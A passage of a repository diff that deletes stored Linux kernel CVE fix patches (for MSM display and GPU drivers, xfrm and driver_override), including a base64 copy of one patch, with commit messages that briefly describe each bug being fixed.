@@ -1,61 +0,0 @@
-From 10b0cb47e92abe52c5372ded0fe80a5a5f18586f Mon Sep 17 00:00:00 2001
-From: Harsh Sahu <hsahu@codeaurora.org>
-Date: Thu, 29 Jun 2017 18:50:20 -0700
-Subject: [PATCH] msm: mdss: fix the use after free problem in rotator ioctl
-
-Currently the fence fd is installed too early. This can cause a
-use after free problem if the fence fd is closed in some other thread.
-This change will install the fence fd where it is required and
-eliminates the problem.
-
-Bug: 37478866
-Change-Id: I5cf585ea87ef75fccae06da6cb5a6c16fc74eff3
-Signed-off-by: Harsh Sahu <hsahu@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_rotator.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_rotator.c b/drivers/video/msm/mdss/mdss_rotator.c
-index 95ca5b74e2369..5910a69bc844b 100644
---- a/drivers/video/msm/mdss/mdss_rotator.c
-+++ b/drivers/video/msm/mdss/mdss_rotator.c
-@@ -375,6 +375,15 @@ static bool mdss_rotator_is_work_pending(struct mdss_rot_mgr *mgr,
- 	return false;
- }
- 
-+static void mdss_rotator_install_fence_fd(struct mdss_rot_entry_container *req)
-+{
-+	int i = 0;
-+
-+	for (i = 0; i < req->count; i++)
-+		sync_fence_install(req->entries[i].output_fence,
-+				req->entries[i].output_fence_fd);
-+}
-+
- static int mdss_rotator_create_fence(struct mdss_rot_entry *entry)
- {
- 	int ret = 0, fd;
-@@ -413,7 +422,6 @@ static int mdss_rotator_create_fence(struct mdss_rot_entry *entry)
- 		goto get_fd_err;
- 	}
- 
--	sync_fence_install(fence, fd);
- 	rot_timeline->next_value++;
- 	mutex_unlock(&rot_timeline->lock);
- 
-@@ -2248,6 +2256,7 @@ static int mdss_rotator_handle_request(struct mdss_rot_mgr *mgr,
- 		goto handle_request_err1;
- 	}
- 
-+	mdss_rotator_install_fence_fd(req);
- 	mdss_rotator_queue_request(mgr, private, req);
- 
- 	mutex_unlock(&mgr->lock);
-@@ -2408,6 +2417,7 @@ static int mdss_rotator_handle_request32(struct mdss_rot_mgr *mgr,
- 		goto handle_request32_err1;
- 	}
- 
-+	mdss_rotator_install_fence_fd(req);
- 	mdss_rotator_queue_request(mgr, private, req);
- 
- 	mutex_unlock(&mgr->lock);
diff --git a/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch
deleted file mode 100644
index 14ae6c00..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch
+++ /dev/null
@@ -1,164 +0,0 @@
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 350ad08..44f981c 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1609,6 +1609,7 @@
- 	struct kgsl_device *device;
- 	struct kgsl_cmdbatch *cmdbatch = (struct kgsl_cmdbatch *) data;
- 	struct kgsl_cmdbatch_sync_event *event;
-+	unsigned long flags;
- 
- 	if (cmdbatch == NULL || cmdbatch->context == NULL)
- 		return;
-@@ -1623,14 +1624,14 @@
- 	kgsl_context_dump(cmdbatch->context);
- 	clear_bit(CMDBATCH_FLAG_FENCE_LOG, &cmdbatch->priv);
- 
--	spin_lock(&cmdbatch->lock);
-+	spin_lock_irqsave(&cmdbatch->lock, flags);
- 	/* Print all the fences */
- 	list_for_each_entry(event, &cmdbatch->synclist, node) {
- 		if (KGSL_CMD_SYNCPOINT_TYPE_FENCE == event->type &&
- 			event->handle && event->handle->fence)
- 			kgsl_sync_fence_log(event->handle->fence);
- 	}
--	spin_unlock(&cmdbatch->lock);
-+	spin_unlock_irqrestore(&cmdbatch->lock, flags);
- 	dev_err(device->dev, "--gpu syncpoint deadlock print end--\n");
- }
- /**
-@@ -1685,15 +1686,16 @@
- 	struct kgsl_cmdbatch_sync_event *event)
- {
- 	struct kgsl_cmdbatch_sync_event *e, *tmp;
-+	unsigned long flags;
- 	int sched = 0;
- 	int removed = 0;
- 
- 	/*
--	 * We may have cmdbatch timer running, which also uses same lock,
--	 * take a lock with software interrupt disabled (bh) to avoid
--	 * spin lock recursion.
-+	 * cmdbatch timer or event callback might run at
-+	 * this time in interrupt context and uses same lock.
-+	 * So use irq-save version of spin lock.
- 	 */
--	spin_lock_bh(&event->cmdbatch->lock);
-+	spin_lock_irqsave(&event->cmdbatch->lock, flags);
- 
- 	/*
- 	 * sync events that are contained by a cmdbatch which has been
-@@ -1708,8 +1710,9 @@
- 		}
- 	}
- 
-+	event->handle = NULL;
- 	sched = list_empty(&event->cmdbatch->synclist) ? 1 : 0;
--	spin_unlock_bh(&event->cmdbatch->lock);
-+	spin_unlock_irqrestore(&event->cmdbatch->lock, flags);
- 
- 	/* If the list is empty delete the canary timer */
- 	if (sched)
-@@ -1771,16 +1774,20 @@
- 	struct kgsl_cmdbatch_sync_event *event, *tmpsync;
- 	LIST_HEAD(cancel_synclist);
- 	int sched = 0;
-+	unsigned long flags;
- 
- 	/* Zap the canary timer */
- 	del_timer_sync(&cmdbatch->timer);
- 
--	/* non-bh because we just destroyed timer */
--	spin_lock(&cmdbatch->lock);
-+	/*
-+	 * callback might run in interrupt context
-+	 * so need to use irqsave version of spinlocks.
-+	 */
-+	spin_lock_irqsave(&cmdbatch->lock, flags);
- 
- 	/* Empty the synclist before canceling events */
- 	list_splice_init(&cmdbatch->synclist, &cancel_synclist);
--	spin_unlock(&cmdbatch->lock);
-+	spin_unlock_irqrestore(&cmdbatch->lock, flags);
- 
- 	/*
- 	 * Finish canceling events outside the cmdbatch spinlock and
-@@ -1802,8 +1809,15 @@
- 				kgsl_cmdbatch_sync_func, event);
- 		} else if (event->type == KGSL_CMD_SYNCPOINT_TYPE_FENCE) {
- 			/* Put events that are successfully canceled */
--			if (kgsl_sync_fence_async_cancel(event->handle))
-+			spin_lock_irqsave(&cmdbatch->lock, flags);
-+
-+			if (kgsl_sync_fence_async_cancel(event->handle)) {
-+				event->handle = NULL;
-+				spin_unlock_irqrestore(&cmdbatch->lock, flags);
- 				kgsl_cmdbatch_sync_event_put(event);
-+			} else {
-+				spin_unlock_irqrestore(&cmdbatch->lock, flags);
-+			}
- 		}
- 
- 		/* Put events that have been removed from the synclist */
-@@ -1864,6 +1878,7 @@
- {
- 	struct kgsl_cmd_syncpoint_fence *sync = priv;
- 	struct kgsl_cmdbatch_sync_event *event;
-+	unsigned long flags;
- 
- 	event = kzalloc(sizeof(*event), GFP_KERNEL);
- 
-@@ -1892,11 +1907,6 @@
- 
- 	kref_get(&event->refcount);
- 
--	/* non-bh because, we haven't started cmdbatch timer yet */
--	spin_lock(&cmdbatch->lock);
--	list_add(&event->node, &cmdbatch->synclist);
--	spin_unlock(&cmdbatch->lock);
--
- 	/*
- 	 * Increment the reference count for the async callback.
- 	 * Decrement when the callback is successfully canceled, when
-@@ -1904,6 +1914,10 @@
- 	 */
- 
- 	kref_get(&event->refcount);
-+
-+	spin_lock_irqsave(&cmdbatch->lock, flags);
-+	list_add(&event->node, &cmdbatch->synclist);
-+
- 	event->handle = kgsl_sync_fence_async_wait(sync->fd,
- 		kgsl_cmdbatch_sync_fence_func, event);
- 
-@@ -1911,17 +1925,14 @@
- 		int ret = PTR_ERR(event->handle);
- 
- 		event->handle = NULL;
--
--		/* Failed to add the event to the async callback */
--		kgsl_cmdbatch_sync_event_put(event);
--
- 		/* Remove event from the synclist */
--		spin_lock(&cmdbatch->lock);
- 		list_del(&event->node);
--		spin_unlock(&cmdbatch->lock);
-+		spin_unlock_irqrestore(&cmdbatch->lock, flags);
-+		/* Put for event removal from the synclist */
- 		kgsl_cmdbatch_sync_event_put(event);
--
--		/* Event no longer needed by this function */
-+		/* Unable to add event to the async callback so a put */
-+		kgsl_cmdbatch_sync_event_put(event);
-+		/* Put since event no longer needed by this function */
- 		kgsl_cmdbatch_sync_event_put(event);
- 
- 		/*
-@@ -1935,6 +1946,7 @@
- 	}
- 
- 	trace_syncpoint_fence(cmdbatch, event->handle->name);
-+	spin_unlock_irqrestore(&cmdbatch->lock, flags);
- 
- 	/*
- 	 * Event was successfully added to the synclist, the async
diff --git a/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch.base64
deleted file mode 100644
index 33270417..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11092/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvZ3B1L21zbS9rZ3NsLmMgYi9kcml2ZXJzL2dwdS9tc20va2dzbC5jCmluZGV4IDM1MGFkMDguLjQ0Zjk4MWMgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvZ3B1L21zbS9rZ3NsLmMKKysrIGIvZHJpdmVycy9ncHUvbXNtL2tnc2wuYwpAQCAtMTYwOSw2ICsxNjA5LDcgQEAKIAlzdHJ1Y3Qga2dzbF9kZXZpY2UgKmRldmljZTsKIAlzdHJ1Y3Qga2dzbF9jbWRiYXRjaCAqY21kYmF0Y2ggPSAoc3RydWN0IGtnc2xfY21kYmF0Y2ggKikgZGF0YTsKIAlzdHJ1Y3Qga2dzbF9jbWRiYXRjaF9zeW5jX2V2ZW50ICpldmVudDsKKwl1bnNpZ25lZCBsb25nIGZsYWdzOwogCiAJaWYgKGNtZGJhdGNoID09IE5VTEwgfHwgY21kYmF0Y2gtPmNvbnRleHQgPT0gTlVMTCkKIAkJcmV0dXJuOwpAQCAtMTYyMywxNCArMTYyNCwxNCBAQAogCWtnc2xfY29udGV4dF9kdW1wKGNtZGJhdGNoLT5jb250ZXh0KTsKIAljbGVhcl9iaXQoQ01EQkFUQ0hfRkxBR19GRU5DRV9MT0csICZjbWRiYXRjaC0+cHJpdik7CiAKLQlzcGluX2xvY2soJmNtZGJhdGNoLT5sb2NrKTsKKwlzcGluX2xvY2tfaXJxc2F2ZSgmY21kYmF0Y2gtPmxvY2ssIGZsYWdzKTsKIAkvKiBQcmludCBhbGwgdGhlIGZlbmNlcyAqLwogCWxpc3RfZm9yX2VhY2hfZW50cnkoZXZlbnQsICZjbWRiYXRjaC0+c3luY2xpc3QsIG5vZGUpIHsKIAkJaWYgKEtHU0xfQ01EX1NZTkNQT0lOVF9UWVBFX0ZFTkNFID09IGV2ZW50LT50eXBlICYmCiAJCQlldmVudC0+aGFuZGxlICYmIGV2ZW50LT5oYW5kbGUtPmZlbmNlKQogCQkJa2dzbF9zeW5jX2ZlbmNlX2xvZyhldmVudC0+aGFuZGxlLT5mZW5jZSk7CiAJfQotCXNwaW5fdW5sb2NrKCZjbWRiYXRjaC0+bG9jayk7CisJc3Bpbl91bmxvY2tfaXJxcmVzdG9yZSgmY21kYmF0Y2gtPmxvY2ssIGZsYWdzKTsKIAlkZXZfZXJyKGRldmljZS0+ZGV2LCAiLS1ncHUgc3luY3BvaW50IGRlYWRsb2NrIHByaW50IGVuZC0tXG4iKTsKIH0KIC8qKgpAQCAtMTY4NSwxNSArMTY4NiwxNiBAQAogCXN0cnVjdCBrZ3NsX2NtZGJhdGNoX3N5bmNfZXZlbnQgKmV2ZW50KQogewogCXN0cnVjdCBrZ3NsX2NtZGJhdGNoX3N5bmNfZXZlbnQgKmUsICp0bXA7CisJdW5zaWduZWQgbG9uZyBmbGFnczsKIAlpbnQgc2NoZWQgPSAwOwogCWludCByZW1vdmVkID0gMDsKIAogCS8qCi0JICogV2UgbWF5IGhhdmUgY21kYmF0Y2ggdGltZXIgcnVubmluZywgd2hpY2ggYWxzbyB1c2VzIHNhbWUgbG9jaywKLQkgKiB0YWtlIGEgbG9jayB3aXRoIHNvZnR3YXJlIGludGVycnVwdCBkaXNhYmxlZCAoYmgpIHRvIGF2b2lkCi0JICogc3BpbiBsb2NrIHJlY3Vyc2lvbi4KKwkgKiBjbWRiYXRjaCB0aW1lciBvciBldmVudCBjYWxsYmFjayBtaWdodCBydW4gYXQKKwkgKiB0aGlzIHRpbWUgaW4gaW50ZXJydXB0IGNvbnRleHQgYW5kIHVzZXMgc2FtZSBsb2NrLgorCSAqIFNvIHVzZSBpcnEtc2F2ZSB2ZXJzaW9uIG9mIHNwaW4gbG9jay4KIAkgKi8KLQlzcGluX2xvY2tfYmgoJmV2ZW50LT5jbWRiYXRjaC0+bG9jayk7CisJc3Bpbl9sb2NrX2lycXNhdmUoJmV2ZW50LT5jbWRiYXRjaC0+bG9jaywgZmxhZ3MpOwogCiAJLyoKIAkgKiBzeW5jIGV2ZW50cyB0aGF0IGFyZSBjb250YWluZWQgYnkgYSBjbWRiYXRjaCB3aGljaCBoYXMgYmVlbgpAQCAtMTcwOCw4ICsxNzEwLDkgQEAKIAkJfQogCX0KIAorCWV2ZW50LT5oYW5kbGUgPSBOVUxMOwogCXNjaGVkID0gbGlzdF9lbXB0eSgmZXZlbnQtPmNtZGJhdGNoLT5zeW5jbGlzdCkgPyAxIDogMDsKLQlzcGluX3VubG9ja19iaCgmZXZlbnQtPmNtZGJhdGNoLT5sb2NrKTsKKwlzcGluX3VubG9ja19pcnFyZXN0b3JlKCZldmVudC0+Y21kYmF0Y2gtPmxvY2ssIGZsYWdzKTsKIAogCS8qIElmIHRoZSBsaXN0IGlzIGVtcHR5IGRlbGV0ZSB0aGUgY2FuYXJ5IHRpbWVyICovCiAJaWYgKHNjaGVkKQpAQCAtMTc3MSwxNiArMTc3NCwyMCBAQAogCXN0cnVjdCBrZ3NsX2NtZGJhdGNoX3N5bmNfZXZlbnQgKmV2ZW50LCAqdG1wc3luYzsKIAlMSVNUX0hFQUQoY2FuY2VsX3N5bmNsaXN0KTsKIAlpbnQgc2NoZWQgPSAwOworCXVuc2lnbmVkIGxvbmcgZmxhZ3M7CiAKIAkvKiBaYXAgdGhlIGNhbmFyeSB0aW1lciAqLwogCWRlbF90aW1lcl9zeW5jKCZjbWRiYXRjaC0+dGltZXIpOwogCi0JLyogbm9uLWJoIGJlY2F1c2Ugd2UganVzdCBkZXN0cm95ZWQgdGltZXIgKi8KLQlzcGluX2xvY2soJmNtZGJhdGNoLT5sb2NrKTsKKwkvKgorCSAqIGNhbGxiYWNrIG1pZ2h0IHJ1biBpbiBpbnRlcnJ1cHQgY29udGV4dAorCSAqIHNvIG5lZWQgdG8gdXNlIGlycXNhdmUgdmVyc2lvbiBvZiBzcGlubG9ja3MuCisJICovCisJc3Bpbl9sb2NrX2lycXNhdmUoJmNtZGJhdGNoLT5sb2NrLCBmbGFncyk7CiAKIAkvKiBFbXB0eSB0aGUgc3luY2xpc3QgYmVmb3JlIGNhbmNlbGluZyBldmVudHMgKi8KIAlsaXN0X3NwbGljZV9pbml0KCZjbWRiYXRjaC0+c3luY2xpc3QsICZjYW5jZWxfc3luY2xpc3QpOwotCXNwaW5fdW5sb2NrKCZjbWRiYXRjaC0+bG9jayk7CisJc3Bpbl91bmxvY2tfaXJxcmVzdG9yZSgmY21kYmF0Y2gtPmxvY2ssIGZsYWdzKTsKIAogCS8qCiAJICogRmluaXNoIGNhbmNlbGluZyBldmVudHMgb3V0c2lkZSB0aGUgY21kYmF0Y2ggc3BpbmxvY2sgYW5kCkBAIC0xODAyLDggKzE4MDksMTUgQEAKIAkJCQlrZ3NsX2NtZGJhdGNoX3N5bmNfZnVuYywgZXZlbnQpOwogCQl9IGVsc2UgaWYgKGV2ZW50LT50eXBlID09IEtHU0xfQ01EX1NZTkNQT0lOVF9UWVBFX0ZFTkNFKSB7CiAJCQkvKiBQdXQgZXZlbnRzIHRoYXQgYXJlIHN1Y2Nlc3NmdWxseSBjYW5jZWxlZCAqLwotCQkJaWYgKGtnc2xfc3luY19mZW5jZV9hc3luY19jYW5jZWwoZXZlbnQtPmhhbmRsZSkpCisJCQlzcGluX2xvY2tfaXJxc2F2ZSgmY21kYmF0Y2gtPmxvY2ssIGZsYWdzKTsKKworCQkJaWYgKGtnc2xfc3luY19mZW5jZV9hc3luY19jYW5jZWwoZXZlbnQtPmhhbmRsZSkpIHsKKwkJCQlldmVudC0+aGFuZGxlID0gTlVMTDsKKwkJCQlzcGluX3VubG9ja19pcnFyZXN0b3JlKCZjbWRiYXRjaC0+bG9jaywgZmxhZ3MpOwogCQkJCWtnc2xfY21kYmF0Y2hfc3luY19ldmVudF9wdXQoZXZlbnQpOworCQkJfSBlbHNlIHsKKwkJCQlzcGluX3VubG9ja19pcnFyZXN0b3JlKCZjbWRiYXRjaC0+bG9jaywgZmxhZ3MpOworCQkJfQogCQl9CiAKIAkJLyogUHV0IGV2ZW50cyB0aGF0IGhhdmUgYmVlbiByZW1vdmVkIGZyb20gdGhlIHN5bmNsaXN0ICovCkBAIC0xODY0LDYgKzE4NzgsNyBAQAogewogCXN0cnVjdCBrZ3NsX2NtZF9zeW5jcG9pbnRfZmVuY2UgKnN5bmMgPSBwcml2OwogCXN0cnVjdCBrZ3NsX2NtZGJhdGNoX3N5bmNfZXZlbnQgKmV2ZW50OworCXVuc2lnbmVkIGxvbmcgZmxhZ3M7CiAKIAlldmVudCA9IGt6YWxsb2Moc2l6ZW9mKCpldmVudCksIEdGUF9LRVJORUwpOwogCkBAIC0xODkyLDExICsxOTA3LDYgQEAKIAogCWtyZWZfZ2V0KCZldmVudC0+cmVmY291bnQpOwogCi0JLyogbm9uLWJoIGJlY2F1c2UsIHdlIGhhdmVuJ3Qgc3RhcnRlZCBjbWRiYXRjaCB0aW1lciB5ZXQgKi8KLQlzcGluX2xvY2soJmNtZGJhdGNoLT5sb2NrKTsKLQlsaXN0X2FkZCgmZXZlbnQtPm5vZGUsICZjbWRiYXRjaC0+c3luY2xpc3QpOwotCXNwaW5fdW5sb2NrKCZjbWRiYXRjaC0+bG9jayk7Ci0KIAkvKgogCSAqIEluY3JlbWVudCB0aGUgcmVmZXJlbmNlIGNvdW50IGZvciB0aGUgYXN5bmMgY2FsbGJhY2suCiAJICogRGVjcmVtZW50IHdoZW4gdGhlIGNhbGxiYWNrIGlzIHN1Y2Nlc3NmdWxseSBjYW5jZWxlZCwgd2hlbgpAQCAtMTkwNCw2ICsxOTE0LDEwIEBACiAJICovCiAKIAlrcmVmX2dldCgmZXZlbnQtPnJlZmNvdW50KTsKKworCXNwaW5fbG9ja19pcnFzYXZlKCZjbWRiYXRjaC0+bG9jaywgZmxhZ3MpOworCWxpc3RfYWRkKCZldmVudC0+bm9kZSwgJmNtZGJhdGNoLT5zeW5jbGlzdCk7CisKIAlldmVudC0+aGFuZGxlID0ga2dzbF9zeW5jX2ZlbmNlX2FzeW5jX3dhaXQoc3luYy0+ZmQsCiAJCWtnc2xfY21kYmF0Y2hfc3luY19mZW5jZV9mdW5jLCBldmVudCk7CiAKQEAgLTE5MTEsMTcgKzE5MjUsMTQgQEAKIAkJaW50IHJldCA9IFBUUl9FUlIoZXZlbnQtPmhhbmRsZSk7CiAKIAkJZXZlbnQtPmhhbmRsZSA9IE5VTEw7Ci0KLQkJLyogRmFpbGVkIHRvIGFkZCB0aGUgZXZlbnQgdG8gdGhlIGFzeW5jIGNhbGxiYWNrICovCi0JCWtnc2xfY21kYmF0Y2hfc3luY19ldmVudF9wdXQoZXZlbnQpOwotCiAJCS8qIFJlbW92ZSBldmVudCBmcm9tIHRoZSBzeW5jbGlzdCAqLwotCQlzcGluX2xvY2soJmNtZGJhdGNoLT5sb2NrKTsKIAkJbGlzdF9kZWwoJmV2ZW50LT5ub2RlKTsKLQkJc3Bpbl91bmxvY2soJmNtZGJhdGNoLT5sb2NrKTsKKwkJc3Bpbl91bmxvY2tfaXJxcmVzdG9yZSgmY21kYmF0Y2gtPmxvY2ssIGZsYWdzKTsKKwkJLyogUHV0IGZvciBldmVudCByZW1vdmFsIGZyb20gdGhlIHN5bmNsaXN0ICovCiAJCWtnc2xfY21kYmF0Y2hfc3luY19ldmVudF9wdXQoZXZlbnQpOwotCi0JCS8qIEV2ZW50IG5vIGxvbmdlciBuZWVkZWQgYnkgdGhpcyBmdW5jdGlvbiAqLworCQkvKiBVbmFibGUgdG8gYWRkIGV2ZW50IHRvIHRoZSBhc3luYyBjYWxsYmFjayBzbyBhIHB1dCAqLworCQlrZ3NsX2NtZGJhdGNoX3N5bmNfZXZlbnRfcHV0KGV2ZW50KTsKKwkJLyogUHV0IHNpbmNlIGV2ZW50IG5vIGxvbmdlciBuZWVkZWQgYnkgdGhpcyBmdW5jdGlvbiAqLwogCQlrZ3NsX2NtZGJhdGNoX3N5bmNfZXZlbnRfcHV0KGV2ZW50KTsKIAogCQkvKgpAQCAtMTkzNSw2ICsxOTQ2LDcgQEAKIAl9CiAKIAl0cmFjZV9zeW5jcG9pbnRfZmVuY2UoY21kYmF0Y2gsIGV2ZW50LT5oYW5kbGUtPm5hbWUpOworCXNwaW5fdW5sb2NrX2lycXJlc3RvcmUoJmNtZGJhdGNoLT5sb2NrLCBmbGFncyk7CiAKIAkvKgogCSAqIEV2ZW50IHdhcyBzdWNjZXNzZnVsbHkgYWRkZWQgdG8gdGhlIHN5bmNsaXN0LCB0aGUgYXN5bmMK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-11093/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-11093/3.18/0001.patch
deleted file mode 100644
index c9a4bd42..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11093/3.18/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 072d53b2ca00ac57ca4e0ebe2315b431256cf786 Mon Sep 17 00:00:00 2001
-From: Narender Ankam <nankam@codeaurora.org>
-Date: Wed, 23 Aug 2017 15:55:50 +0530
-Subject: [PATCH] msm: mdss: hdmi: validate HDMI EDID's max number of CEA
- blocks
-
-No upper-bound validation is performed when reading number of
-extended CEA blocks from the untrusted source (EDID). Add a check
-to limit the number of CEA extension blocks.
-
-Bug: 37625232
-Change-Id: I69f09ed0ad28a4c267cf3e8f7a12efe46f75e244
-Signed-off-by: Narender Ankam <nankam@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_hdmi_edid.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_edid.c b/drivers/video/msm/mdss/mdss_hdmi_edid.c
-index 36c24302658d8..5c8f52c42302c 100644
---- a/drivers/video/msm/mdss/mdss_hdmi_edid.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_edid.c
-@@ -2180,6 +2180,13 @@ int hdmi_edid_parser(void *input)
- 		goto bail;
- 	}
- 
-+	/* Find out if CEA extension blocks exceeding max limit */
-+	if (num_of_cea_blocks >= MAX_EDID_BLOCKS) {
-+		DEV_WARN("%s: HDMI EDID exceeded max CEA blocks limit\n",
-+				__func__);
-+		num_of_cea_blocks = MAX_EDID_BLOCKS - 1;
-+	}
-+
- 	/* check for valid CEA block */
- 	if (edid_buf[EDID_BLOCK_SIZE] != 2) {
- 		DEV_ERR("%s: Invalid CEA block\n", __func__);
diff --git a/Patches/Linux_CVEs/CVE-2017-11600/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-11600/3.10/0001.patch
deleted file mode 100644
index 900cfb11..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11600/3.10/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From 0af5440977299a17a0f226ce00d872572a426c14 Mon Sep 17 00:00:00 2001
-From: Suren Baghdasaryan <surenb@google.com>
-Date: Tue, 15 Aug 2017 15:12:24 -0700
-Subject: [PATCH] ANDROID: check dir value of xfrm_userpolicy_id
-
-Check user provided dir value to prevent out-of-bound access
-which may occur if dir is not less than XFRM_POLICY_MAX.
-
-(url: http://seclists.org/bugtraq/2017/Jul/30)
-
-Bug: 64257838
-Signed-off-by: Suren Baghdasaryan <surenb@google.com>
-Change-Id: I5bbdf95e14a61bdf5207977d9a5a4465bc848da0
----
- net/xfrm/xfrm_user.c | 18 ++++++++++++++++++
- 1 file changed, 18 insertions(+)
-
-diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
-index 3f565e495ac6..0cc105403826 100644
---- a/net/xfrm/xfrm_user.c
-+++ b/net/xfrm/xfrm_user.c
-@@ -1583,6 +1583,10 @@ static struct sk_buff *xfrm_policy_netlink(struct sk_buff *in_skb,
- 	struct sk_buff *skb;
- 	int err;
- 
-+	err = verify_policy_dir(dir);
-+	if (err)
-+		return ERR_PTR(err);
-+
- 	skb = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
- 	if (!skb)
- 		return ERR_PTR(-ENOMEM);
-@@ -2129,6 +2133,10 @@ static int xfrm_do_migrate(struct sk_buff *skb, struct nlmsghdr *nlh,
- 	int err;
- 	int n = 0;
- 
-+	err = verify_policy_dir(pi->dir);
-+	if (err)
-+		return err;
-+
- 	if (attrs[XFRMA_MIGRATE] == NULL)
- 		return -EINVAL;
- 
-@@ -2243,6 +2251,11 @@ static int xfrm_send_migrate(const struct xfrm_selector *sel, u8 dir, u8 type,
- {
- 	struct net *net = &init_net;
- 	struct sk_buff *skb;
-+	int err;
-+
-+	err = verify_policy_dir(dir);
-+	if (err)
-+		return err;
- 
- 	skb = nlmsg_new(xfrm_migrate_msgsize(num_migrate, !!k), GFP_ATOMIC);
- 	if (skb == NULL)
-@@ -2871,6 +2884,11 @@ static int xfrm_notify_policy_flush(const struct km_event *c)
- 
- static int xfrm_send_policy_notify(struct xfrm_policy *xp, int dir, const struct km_event *c)
- {
-+	int err;
-+
-+	err = verify_policy_dir(dir);
-+	if (err)
-+		return err;
- 
- 	switch (c->event) {
- 	case XFRM_MSG_NEWPOLICY:
diff --git a/Patches/Linux_CVEs/CVE-2017-11600/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-11600/3.10/0002.patch
deleted file mode 100644
index 61187e6f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11600/3.10/0002.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 7bab09631c2a303f87a7eb7e3d69e888673b9b7e Mon Sep 17 00:00:00 2001
-From: Vladis Dronov <vdronov@redhat.com>
-Date: Wed, 2 Aug 2017 19:50:14 +0200
-Subject: xfrm: policy: check policy direction value
-
-The 'dir' parameter in xfrm_migrate() is a user-controlled byte which is used
-as an array index. This can lead to an out-of-bound access, kernel lockup and
-DoS. Add a check for the 'dir' value.
-
-This fixes CVE-2017-11600.
-
-References: https://bugzilla.redhat.com/show_bug.cgi?id=1474928
-Fixes: 80c9abaabf42 ("[XFRM]: Extension for dynamic update of endpoint address(es)")
-Cc: <stable@vger.kernel.org> # v2.6.21-rc1
-Reported-by: "bo Zhang" <zhangbo5891001@gmail.com>
-Signed-off-by: Vladis Dronov <vdronov@redhat.com>
-Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
----
- net/xfrm/xfrm_policy.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
-index ff61d85..6f5a0dad 100644
---- a/net/xfrm/xfrm_policy.c
-+++ b/net/xfrm/xfrm_policy.c
-@@ -3308,9 +3308,15 @@ int xfrm_migrate(const struct xfrm_selector *sel, u8 dir, u8 type,
- 	struct xfrm_state *x_new[XFRM_MAX_DEPTH];
- 	struct xfrm_migrate *mp;
- 
-+	/* Stage 0 - sanity checks */
- 	if ((err = xfrm_migrate_check(m, num_migrate)) < 0)
- 		goto out;
- 
-+	if (dir >= XFRM_POLICY_MAX) {
-+		err = -EINVAL;
-+		goto out;
-+	}
-+
- 	/* Stage 1 - find policy */
- 	if ((pol = xfrm_migrate_policy_find(sel, dir, type, net)) == NULL) {
- 		err = -ENOENT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-12146/3.16+/0001.patch b/Patches/Linux_CVEs/CVE-2017-12146/3.16+/0001.patch
deleted file mode 100644
index 2ae4f16e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-12146/3.16+/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From 6265539776a0810b7ce6398c27866ddb9c6bd154 Mon Sep 17 00:00:00 2001
-From: Adrian Salido <salidoa@google.com>
-Date: Tue, 25 Apr 2017 16:55:26 -0700
-Subject: driver core: platform: fix race condition with driver_override
-
-The driver_override implementation is susceptible to race condition when
-different threads are reading vs storing a different driver override.
-Add locking to avoid race condition.
-
-Fixes: 3d713e0e382e ("driver core: platform: add device binding path 'driver_override'")
-Cc: stable@vger.kernel.org
-Signed-off-by: Adrian Salido <salidoa@google.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/base/platform.c | 11 +++++++++--
- 1 file changed, 9 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/base/platform.c b/drivers/base/platform.c
-index a102152..97332d0 100644
---- a/drivers/base/platform.c
-+++ b/drivers/base/platform.c
-@@ -866,7 +866,7 @@ static ssize_t driver_override_store(struct device *dev,
- 				     const char *buf, size_t count)
- {
- 	struct platform_device *pdev = to_platform_device(dev);
--	char *driver_override, *old = pdev->driver_override, *cp;
-+	char *driver_override, *old, *cp;
- 
- 	if (count > PATH_MAX)
- 		return -EINVAL;
-@@ -879,12 +879,15 @@ static ssize_t driver_override_store(struct device *dev,
- 	if (cp)
- 		*cp = '\0';
- 
-+	device_lock(dev);
-+	old = pdev->driver_override;
- 	if (strlen(driver_override)) {
- 		pdev->driver_override = driver_override;
- 	} else {
- 		kfree(driver_override);
- 		pdev->driver_override = NULL;
- 	}
-+	device_unlock(dev);
- 
- 	kfree(old);
- 
-@@ -895,8 +898,12 @@ static ssize_t driver_override_show(struct device *dev,
- 				    struct device_attribute *attr, char *buf)
- {
- 	struct platform_device *pdev = to_platform_device(dev);
-+	ssize_t len;
- 
